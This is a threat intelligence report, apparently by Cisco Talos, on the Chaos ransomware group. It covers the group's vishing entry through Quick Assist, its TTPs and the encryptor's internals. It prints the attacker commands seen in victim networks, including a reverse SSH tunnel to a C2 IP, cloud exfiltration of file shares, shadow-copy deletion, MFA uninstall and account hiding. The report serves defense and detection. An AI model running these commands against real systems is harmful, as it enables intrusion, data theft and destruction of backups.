Unmasking the new Chaos RaaS group attacks

Unmasking the new Chaos RaaS group attacks

/in
  • Cisco Talos Incident Response (Talos IR) recently observed attacks by Chaos, a relatively new ransomware-as-a-service (RaaS) group conducting big-game hunting and double extortion attacks.  
  • Chaos RaaS actors initiated low-effort spam flooding, escalating to voice-based social engineering for access, followed by RMM tool abuse for persistent connection and legitimate file-sharing software for data exfiltration. 
  • The ransomware utilizes multi-threaded rapid selective encryption, anti-analysis techniques, and targets both local and network resources, maximizing impact while hindering detection and recovery. 
  • Talos believes the new Chaos ransomware is unrelated to previous Chaos builder-generated variants, as the group uses the same name to create confusion.  
  • Talos assesses with moderate confidence that the new group is likely formed by former members of the BlackSuit (Royal) gang, based on similarities in the ransomware’s encryption methodology, ransom note structure, and the toolset used in the attacks. 

Victimology 

Unmasking the new Chaos RaaS group attacks

The new Chaos has impacted a wide variety of business verticals and seems to be opportunistic without focusing on any specific verticals. Victims have been predominantly in the U.S. and a fewer in the UK, New Zealand and India according to the actor’s data leak site. 

Who is Chaos? 

Chaos is a relatively new RaaS group that emerged as early as February 2025. The Chaos group is actively promoting their cross-platform ransomware software in the dark web Russian-speaking cybercriminal forum Ransom Anon Market Place (RAMP) and is seeking collaboration with affiliates. They emphasize that the new Chaos ransomware software is compatible with Windows, ESXi, Linux and NAS systems, with features such as individual file encryption keys, rapid encryption speeds and network resource scanning — all with a strong emphasis on high-speed encryption and robust security measures.  

Additionally, the group provides an automated panel for managing targets and communications, which requires a paid entry fee that is refundable upon the first case of payment. They have also clearly stated in their dark web forum post that they explicitly avoid collaborating with BRICS/CIS countries, hospitals and government entities. 

Furthermore, the group is offering an onion URL for potential affiliates to register for an account with the Chaos group and has provided a support email address at “win88@thesecure[.]biz”. 

Talos IR observed that the group has been launching big-game hunting and double extortion attacks. Like other operators in the double extortion space, Chaos also runs a data leak site to disclose the stolen data of victims who fail to meet their ransom demands. 

Unmasking the new Chaos RaaS group attacks
Figure 2. Chaos data leak site homepage.

Chaos encrypts the victim’s environment, uses “.chaos” as the file extension for the encrypted files, and drops the ransom note “readme.chaos[.]txt”. In the ransom note, the actor claims that they attempted to perform security testing in the victim’s environment and were successful in compromising it. They also threaten the victims with the disclosure of their stolen confidential data if they fail to pay the ransom amount. The actor does not leave an initial ransom demand or payment instructions in their ransom note but provides instructions to contact them using an onion URL specific to each victim. 

Unmasking the new Chaos RaaS group attacks
Figure 3. Chaos ransom note.

Talos IR observed that the actor demanded a ransom amount of $300K through the victim communication channel and offered two options. If the victim pays the amount, the actor will provide a decryptor application for targeted environments, along with a detailed report of the penetration test conducted on the victim’s environment. They also assure the victim that the stolen data will not be disclosed and will be permanently deleted, ensuring that they will not conduct repeated attacks. 

If the victim fails to pay the ransom, the actor threatens to disclose their stolen data and conduct a distributed denial-of-service (DDoS) attack on all the victim’s internet-facing services, as well as spread the news of their data breach to competitors and clients. 

Unmasking the new Chaos RaaS group attacks
Figure 4. Chaos actor demand. 

The Chaos ransomware actor is a recent and concerning addition to the evolving threat landscape, having shown minimal historical activity before the current wave of intrusions. Importantly, this new Chaos ransomware gang is not connected to the variants produced by the Chaos ransomware builder tool or its developers. To hide their identity, these threat actors have exploited the confusion within the security community regarding the name “Chaos” and its various variants and associated builder tools. This deliberate obfuscation complicates the identification and mitigation of risks posed by this emerging threat. 

Unmasking the new Chaos RaaS group attacks
Figure 5. Chaos RaaS diamond model.

Recent attack methodologies and notable TTPs 

During our investigation of Chaos ransomware attacks, the Talos IR team observed several significant, noteworthy TTPs. 

Initial access 

T1078 – Valid Accounts 

T1598.004 – Phishing for Information: Voice Phishing (Vishing) 

The actor has gained initial access to the victim through social engineering, utilizing phishing and voice phishing techniques. The victim was initially flooded with spam emails, encouraging them to contact the threat actor via a telephone call. When the victim reaches out, the threat actor, impersonating IT security representatives, advises the victim to launch a built-in remote assistance tool on their Windows machine, specifically Microsoft Quick Assist, and instructs them to connect to the actor’s session. 

Discovery  

T1016 – System Network Configuration Discovery 

T1482 – Domain Trust Discovery 

T1033 – System Owner/User Discovery 

T1057 – Process Discovery 

T1018 – Remote System Discovery 

T1135 – Network Share Discovery 

Talos IR observed multiple commands executed by the actor in the victim environment to carry out post-compromise discovery and reconnaissance. The actor collects network configuration details, information about the domain controller and trust relationships, logged-in user data, running processes, and performs reverse DNS lookup. 

ipconfig /all  
nltest /dclist  
nltest.exe /domain_trusts  
nltest.exe /dclist:$domain  
nslookup $Internal_IP_address 
net view $Internal_IP /all 
quser.exe  
tasklist.exe

Execution 

T1059.001 – PowerShellT1059 – Command and Scripting Interpreter 

T1047 – Windows Management Instrumentation  

The actor executed scripts and commands to perform the following actions on the victim machine, preparing the environment to download and execute malicious files and connect to the actor’s command and control (C2) server. 

  • The threat actor executes the following PowerShell command to set the working environment on the victim machine. 

powershell.exe -noexit -command Set-Location -literalPath 'C:Users$userDesktop'

  • The actor executes the command on all the compromised machines in the victim’s network to set the Windows delivery optimization for allowing the files to be downloaded from a local server on port 8005 that are greater than 50 MB in size, ensuring the large files are downloaded efficiently from peer servers.  

PowerShell.exe -Nologo -Noninteractive - NoProfile -ExecutionPolicy Bypass; Get-DeliveryOptimizationStatus | where-object {($.Sourceurl -CLike 'hxxp[://]localhost[:]8005*') -AND (($.FileSize -ge '52428800') -or ($.BytesFromPeers -ne '0') -or (($.BytesFromCacheServer -ne '0') -and ($_.BytesFromCacheServer -ne $null)))} | select-object -Property BytesFromHttp, FileId, BytesFromPeers,Status,BytesFromCacheServer,SourceURL | ConvertTo-Xml -as string - NoTypeInformation

  • We also observed that the actor has used “atexec” tool from the Impacket toolkit for remote command execution.  

Persistence  

T1547.001 – Boot or Logon Initialization: Registry Run Keys / Startup Folder   

T1133 – External Remote Services 

Talos IR observed that the actor has installed RMM tools such as AnyDesk, ScreenConnect, OptiTune, Syncro RMM and Splashtop streamer on compromised machines to establish persistent connection to the victim network. 

The actor executed a command to modify the Windows registry setting to hide a user account from the Windows login screen. By configuring this registry setting the user account still exists and can be used to log in using Remote Desktop Protocol (RDP) or runas, without the username being displayed on Welcome or login screen.  

cmd.exe /c reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserlist /v $user_account /t REG_DWORD /d 0 /f

To secure continuous access to the victim machines, the actor also uses net[.]exe utility to reset the passwords of the enumerated domain user accounts in the victim network. 

net[.]exe user $user_name $password /dom

Credential access and privilege escalation 

T1555 – Credentials from Password Stores 

Talos IR observed that the threat actor executed an “ldapsearch” command remotely on the victim machine through the reverse SSH tunnel and dumped the user details from the active directory to a text file. The actor is likely attempting to steal the credentials of the privileged accounts in the victim’s active directory using the kerberoasting technique, thereby gaining elevated privilege access in the victim’s environment.  

Defense evasion 

T1036.005 – Masquerading: Match Legitimate Name or Location  

T1027 – Obfuscated Files or Information  

T1562.001 – Impair Defenses: Disable or Modify Tools  

Talos IR observed that the actor deletes the PowerShell event logs on the victim machine to evade the security controls, they also attempted to uninstall security or multifactor authentication application on the victim machine using Windows Management Instrumentation Commands (WMIC).  

cmd.EXE /c wmic product where name=$MFA_application for Windows Logon x64 call uninstall /nointeractive

Lateral movement  

T1021.001 – Remote Services: Remote Desktop Protocol (RDP)   

T1021.004 – Remote Services: SSH  

T1021.002 – SMB/Windows Admin Shares   

Talos IR found that the actor leveraged an RDP client and Impacket, facilitating the command execution over Server Message Block (SMB) and Windows Management Instrumentation (WMI) to move laterally in the victim’s network.  

mstsc.exe /v:$remote machine hostname 
wmic /node:$host process call create “C:Usersencryptor[.]exe /lkey:"$32-bytekey" /encrypt_step:40 /work_mode:local_network”

Collection and exfiltration  

T1005 – Data from Local System 

T1567.002 – Exfiltration Over Web Service 

T1036.004 – Masquerading: Masquerade Task or Service 

T1059.003 – Command and Scripting Interpreter: Windows Command Shell 

During our investigation, we found that the actor used GoodSync, a legitimate and widely used file synchronization and backup software, in the attack to extract the data from the victim’s machine. 

The actor has executed a command using a file synchronization or cloud upload tool masquerading as a legitimate Windows executable “wininit[.]exe” to copy data from a network file share to a threat actor-controlled remote cloud storage location.  

The command filters files on the victim machine to include only those files modified within the last year and excludes several file types, possibly to avoid large or sensitive files that may trigger detection, including: Adobe Photoshop documents, 7-Zip compressed archives, Microsoft Outlook files, image and audio files, generic database files, log files, temporary files, Hyper-V virtual hard disk files, Microsoft installer packages, executable files, dynamic-link library files, and disc image files. 

Wininit[.]exe copy --max-age 1y --exclude 
*{psd,7z, mox,pst,FIT, FIL,MOV,mdb,iso,exe,dll,wav,png,db,log,HEIC,dwg,tmp,vhdx,msi} 
[\]FS01[]data cloud1:basket123/data -q --ignore-existing --auto-confirm --multi- 
thread-streams 25 --transfers 15 --b2-disable-checksum -P

Command and control 

T1071 – Application Layer Protocol: SSH 

T1219 – Remote Access Software  

T1105 – Ingress Tool Transfer  

The actor uses the Windows OpenSSH client to execute a command that establishes a reverse SSH tunnel from the victim machine to the actor’s C2 server with the IP address “45[.]61[.]134[.]36” and the port 443 instead of the default SSH port. The actor also attempted to disable the SSH fingerprint checking by not storing the host key in the “known_hosts” file. We spotted that the actor attempts to set up remote port forwarding, where port 12840 on the remote server is forwarded to port 12840 on the local victim machine. 

C:WINDOWSSystem32OpenSSHssh[.]exe -R :12840 -N 
userconnectnopass@45[.]61[.]134[.]36 -p 443 -o UserKnownHostsFile=/dev/null -o 
StrictHostKeyChecking=no

Impact  

T1490 – Inhibit System Recovery   

T1486 – Data Encrypted for Impact 

Talos IR observed during investigation the evidence of the encryption command execution in the victim environment. The ransomware performs selective encryption on the targeted files on the victim machines by encrypting specific portions of the files, enhancing the speed of the encryption. It appends “.chaos” file extensions to the encrypted files on the victim machine. 

Chaos Windows encryption command: 

C:Users$filename[.]exe /lkey:"32-byte key" /encrypt_step:40 /work_mode:local_network

Chaos ransomware encryptor analysis 

The new Chaos ransomware represents an encryptor that possesses the ability to encrypt files not only across local resources but also throughout network resources. It employs anti-analysis techniques specifically designed to evade detection, alongside a multi-threaded operation that facilitates rapid encryption. This design is intended for maximum impact on targeted organizations, all while ensuring operational stealth and implementing recovery prevention capabilities.  

Talos found a few samples of Windows version of the Chaos ransomware encryptor, which are 32-bit executables that were compiled in February, March and May 2025, indicating the active operations of the Chaos group. 

In this section we explain the functionalities of the new Chaos ransomware encryptor used to target Windows machines. 

Anti-analysis techniques 

The Chaos ransomware implements a multi-layered anti-analysis technique that systematically identifies and evades a range of debugging tools, virtual machine environments, automated sandboxes and security analysis platforms through window enumeration, process monitoring and timing analysis techniques: 

  • Ransomware specifically targets and detects debugging environments by enumerating the window classes and title pattern matching the debugger application window. 
  • It detects virtual machine and sandbox environments utilizing both process enumeration and window class detection techniques.  
  • It detects various security and monitoring tools used for threat and malware analysis using process enumeration. 

All these detection evasion techniques are implemented in the ransomware by employing hash-based comparisons against precomputed signatures to avoid storing plaintext tool names that could be detected through static analysis, ensuring the malware immediately terminates execution upon detecting any analysis environment to prevent analysis. 

Configuration and initialization 

Following a successful evasion, the ransomware parses command-line configuration parameters provided by the operator during the attack. A sample encryption command is shown below: 

Encryptor[.]exe /lkey:"32-byte key" /encrypt_step:$0-100 /work_mode:$mode /ignorar_arquivos_grandes

  • A 32-byte encryption key (‘lkey’) 
  • Target directory path (‘path’) 
  • Selective encryption percentage (‘encrypt_step’ defaulting to 30%) 
  • Operation mode (‘work_mode’ supporting local, network, or local_network combined operations) 
  • Large file handling options (‘ignorar_arquivos_grandes’) 
Unmasking the new Chaos RaaS group attacks
Figure 6. Snippet of the function parsing the encryption configuration command-line parameters. 

Simultaneously, the ransomware executes an obfuscated system command that performs shadow copy deletion to prevent file recovery through Windows System Restore. Each character of the command is stored as byte value followed by 0x0E in the binary and is decrypted during execution using the custom algorithm shown in the screenshot. 

 The decrypted volume shadow copy deletion command is shown below: 

cmd.exe /c vssadmin to delete shadows /all

Unmasking the new Chaos RaaS group attacks
Figure 7. Snippet of the function to decrypt and execute the volume shadow copy deletion command. 

Encryption algorithm and process  

The ransomware employs hybrid cryptographic techniques utilizing Elliptic Curve Diffie-Hellman (ECDH) with Curve25519 for asymmetric operations and AES-256 for symmetric file encryption.   

In each execution, the ransomware generates a unique ECC key pair using windows CNG (Cryptography Next Generation), with the private key maintained in memory and the public key exported as ECCPUBLICBLOB format. File-specific encryption keys are derived through ECDH key agreement combined with the operator-controlled 32-byte master key and another key (generated for each encryption iteration), ensuring each file receives a unique encryption key.  

Unmasking the new Chaos RaaS group attacks
Figure 8. Function initializes the cryptographic provider.

Chaos Ransomware handles three different modes of encryption: local, network and local_network (both).  

In local encryption mode, the ransomware is configured to encrypt only the targeted set of files on the infected machine. It initiates its attempts by seeking normal access, and in the event of a failure to gain standard access, it elevates its privileges by modifying the security descriptors, followed by executing token impersonation. It accomplishes this by enumerating system processes such as svchost.exe and explorer.exe, subsequently opening process tokens. Through this method, the ransomware impersonates high-privilege security contexts, effectively bypassing file access restrictions on victim machines. 

Unmasking the new Chaos RaaS group attacks
Figure 9. Privilege escalation function of Chaos ransomware.

 The ransomware performs recursive directory traversal while skipping system-critical folders and files to prevent system instability while targeting user created documents. Folders excluded for encryption by Chaos ransomware on Windows machines include: 

  • System folders: Windows, boot, system volume information, perflogs 
  • Browser data: Mozilla, google, tor browser 
  • Application directories: Appdata, msocache, intel 
  • Maintenance folders: $recycle.bin, windows.old, $windows.~ws, $windows.~bt  

Files excluded for encryption by Chaos ransomware on Windows Machine include: 

  • Boot files: bootsect.bak, boot.ini, ntldr, bootfont.bin 
  • System files: ntuser.dat, autorun.inf, desktop.ini, ntuser.ini, ntuser.dat.log 
  • Diagnostic files: diagpkg, diagcab, diagcfg 
  • Theme files: msstyles, themepack, deskthemepack, theme 
  • Other files: Icns, lock, nomedia and files without file extensions 
  • Previously encrypted files: *.chaos extension  

In the network encryption mode, the ransomware performs  network discovery by enumerating local network interfaces, identifying private IP address ranges, generating target lists for all hosts within discovered subnets and connects to discovered machines using SMB, and enumerating and queuing the available network shares for encryption while excluding the administrative shares (ADMIN$, C$ and IPC$). This technique may allow the ransomware to propagate across entire corporate infrastructures, encrypting shared drives, network-attached storage and distributed file systems, significantly amplifying the attack’s impact. 

Chaos ransomware performs selective encryption based on the command line configuration parameter “/encrypt_step” specified by the operator during the attack. It calculates specific file offsets for encryption to optimize the encryption speed with complete file corruption. It appends metadata of 60 bytes containing the public key in ECCPUBLICBLOB format and other encryption parameters such as algorithm identifier, key data size to every encrypted file and renames the file extension with the “.chaos” extension. 

Unmasking the new Chaos RaaS group attacks
Figure 10. Snippet of the encryption function initializing “.chaos” file extensions. 

Ransom note deployment and clean-up 

The ransomware decrypts its ransom note message using a custom XOR cipher with a 25-byte key. It allocates 1310 bytes (0x51E) for the decrypted note in the machine memory and employs complex offset calculations to obfuscate the simple XOR operation. The encrypted data is decrypted in 5-byte chunks using a distinct XOR key pattern from the 25-byte key. The decrypted ransom message is written in the file “readme[.]chaos[.]txt”.  

The 25-byte key used for ransom note XOR decryption is: 

e2 80 9a d0 a3 28 65 d1 97 d0 b9 d0 94 09 3e d1 85 d1 86 1d 01 e2 80 b9 e2 

Unmasking the new Chaos RaaS group attacks
Figure 11. Snippet of the ransom note decryption function. 

After completing encryption, the ransomware executes cleanup procedures, which include worker threads termination, freeing memory buffers, releasing cryptographic resources, cleaning network connections, closing file handles, and terminating the process, ensuring the proper program termination. 

Chaos TTPs overlap with BlackSuit (Royal) ransomware  

Talos assesses with moderate confidence that the new Chaos ransomware group is either a rebranding of the BlackSuit (Royal) ransomware or operated by some of its former members. This assessment is based on the similarities in TTPs, including encryption commands, the theme and structure of the ransom note, and the use of LOLbins and RMM tools in their attacks. 

Talos IR observed that the Chaos operator utilizes configuration parameters for the encryption process during the attack, including “lkey”, “encrypt_step”, and “work_mode”. This configuration enables the ransomware to selectively encrypt both local and network resources within the victim’s environment. 

Enc.exe /lkey:"" /encrypt_step:40 /work_mode:local_network 
32-byte>

A similar encryption technique usage was seen in earlier Royal and BlackSuit ransomware attacks according to the external security reporting. Although the names of the encryption parameters used seemed different, the action remained the same. 

The table shows the encryption parameters similarities of the new Chaos and BlackSuit (Royal) ransomware. 

Chaos 

BlackSuit (Royal) 

Purpose 

 /lkey 

-id 

32-byte key 

/encrypt_step 

-ep 

Defines the portion / percentage of each targeted file to be encrypted. 

/kill_vms 

stopvm 

stops virtual machines from running on the target system 

The Chaos ransomware ransom note shares a similar theme and structure to Royal/BlackSuit, including a greeting, references to a security test, double extortion messaging, assurances of data confidentiality and an onion URL for contact. 

Unmasking the new Chaos RaaS group attacks
Figure 12. Ransom note of BlackSuit ransomware. 
Unmasking the new Chaos RaaS group attacks
Figure 13. Ransom note of Royal ransomware. 

Additionally, Talos observed the similarities in the techniques employed in the Chaos ransomware attacks with that of the BlackSuit ransomware TTPs, as reported in CISA’s StopRansomware advisory for BlackSuit (Royal) ransomware. 

Coverage  

Ways our customers can detect and block this threat are listed below.  

Unmasking the new Chaos RaaS group attacks

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please  

contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.  

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.   

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.   

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.   

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Snort SIDs for the threats are: 

  • Snort2: 65125, 65126 
  • Snort3: 301273 

ClamAV detections are also available for this threat: 

  • Win.Ransomware.Chaos-10045485-0 

Indicators of compromise (IOCs) 

IOCs for this threat can be found in our GitHub repository here

Cisco Talos Blog – ​Read More